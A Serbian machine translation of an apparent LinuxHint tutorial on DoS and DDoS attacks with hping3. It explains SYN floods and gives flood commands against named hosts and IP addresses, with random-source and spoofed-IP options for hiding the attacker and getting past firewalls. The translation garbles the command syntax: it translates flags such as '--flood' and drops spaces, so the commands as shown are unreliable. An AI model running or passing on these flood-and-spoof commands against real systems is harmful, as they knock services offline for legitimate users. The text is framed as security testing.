ДОС напади
Напад ускраћивања услуге (ДОС) је врло једноставна техника за ускраћивање приступа услугама (зато се назива напад ускраћивањем услуге). Овај напад се састоји од преоптерећења мете великим пакетима или великом количином њих.
Иако је овај напад врло једноставан за извођење, не угрожава информације или приватност мете, није продоран напад и има за циљ само спречавање приступа мети.
Слањем одређене количине пакета циљ не може да се носи са нападачима који спречавају сервер да служи легитимним корисницима.
ДОС напади се изводе са једног уређаја, па их је лако зауставити блокирањем нападачеве ИП адресе, али нападач може променити, па чак и преварити (клонирати) циљну ИП адресу, али заштитним зидовима није тешко да се носе са таквим нападима , супротно ономе што се дешава са ДДОС нападима.
ДДОС напади
Напад дистрибуираног ускраћивања услуге (ДДОС) сличан је нападу у ДОС -у, али се изводи из различитих чворова (или различитих нападача) истовремено. Уобичајено, ДДОС нападе изводе ботнети. Ботнети су аутоматизоване скрипте или програми који инфицирају рачунаре да би извршили аутоматизовани задатак (у овом случају ДДОС напад). Хакер може створити ботнет и заразити многе рачунаре са којих ће ботнети покренути ДОС нападе, чињеница да многи ботнети пуцају истовремено претвара ДОС напад у ДДОС напад (зато се и назива дистрибуираним).
Наравно, постоје изузеци у којима су ДДОС нападе изводили прави људски нападачи, на пример, хакерска група Анонимоус, коју је интегрисало на хиљаде људи широм света, користила је ову технику врло често због њене лаке имплементације (били су потребни само добровољци који су делили њихов узрок), тако је на пример Анонимоус оставио Гадафијеву либијску владу потпуно искљученом током инвазије, либијска држава је остала без одбране пред хиљадама нападача из целог света.
Ова врста напада, када се изводи са много различитих чворова, изузетно је тешка за спречавање и заустављање и обично захтева посебан хардвер за решавање, то је зато што заштитни зидови и одбрамбене апликације нису спремни да се носе са хиљадама нападача истовремено. Ово није случај са хпинг3, већина напада изведених путем овог алата биће блокирана одбрамбеним уређајима или софтвером, али је корисна у локалним мрежама или против слабо заштићених мета.
О хпинг3
Алатка хпинг3 вам омогућава да шаљете манипулиране пакете. Овај алат вам омогућава да контролишете величину, количину и фрагментацију пакета како бисте преоптеретили циљ и заобишли или напали заштитне зидове. Хпинг3 може бити користан у сврхе тестирања безбедности или способности, помоћу њега можете тестирати ефикасност заштитних зидова и ако сервер може да рукује великом количином пакета. Испод ћете пронаћи упутства о томе како користити хпинг3 у сврхе безбедносног тестирања.
За почетак са ДДОС нападима помоћу хпинг3:
На Дебиан и Линук дистрибуцијама можете инсталирати хпинг3 тако што ћете покренути:
#погоданинсталирајхпинг3-и 
Једноставан ДОС (не ДДОС) напад био би:
#судохпинг3-С --поплава -В -п 80170.155.9.185 
Где:
судо: даје потребне привилегије за покретање хпинг3.
хпинг3: позива хпинг3 програм.
-С: специфицира СИН пакете.
- поплава: пуцајте по сопственом нахођењу, одговори ће бити игнорисани (зато се одговори неће приказивати) и пакети ће бити послати што је брже могуће.
-В: Опширност.
-п 80: порт 80, можете заменити овај број за услугу коју желите да нападнете.
170.155.9.185: циљни ИП.
Поплава помоћу СИН пакета према порту 80:
Следећи пример приказује СИН напад на лацампора.орг:
#судохпинг3 лацампора.орг-к -н -д 120 -С -п 80 --поплава --ранд-соурцеГде:
Лацампора.орг: је мета
-к: кратак излаз
-н: прикажи циљни ИП уместо хоста.
-д 120: подесите величину пакета
-извор и извор: сакриј ИП адресу.
Следећи пример приказује још један могући пример поплаве:
СИН поплава против луке 80:
#судохпинг3--ранд-соурцеиван.цом-С -к -п 80 --поплава 
Помоћу хпинг3 можете напасти и своје циљеве лажним ИП -ом, да бисте заобишли заштитни зид, можете чак и сами клонирати свој циљни ИП или било коју дозвољену адресу коју можда знате (можете то постићи, на пример, помоћу Нмап -а или њушкала да бисте слушали утврђене везе).
Синтакса би била следећа:
#судохпинг3-до <ФАКЕ ИП> <мета> -С -к -п 80 --брже -ц2У овом практичном примеру напад би изгледао:
#судохпинг3-до190.0.175.100 190.0.175.100-С -к -п 80 --брже -ц2 
Надам се да вам је овај водич о хпинг3 био користан. Пратите ЛинукХинт за више савета и ажурирања о Линук -у и умрежавању.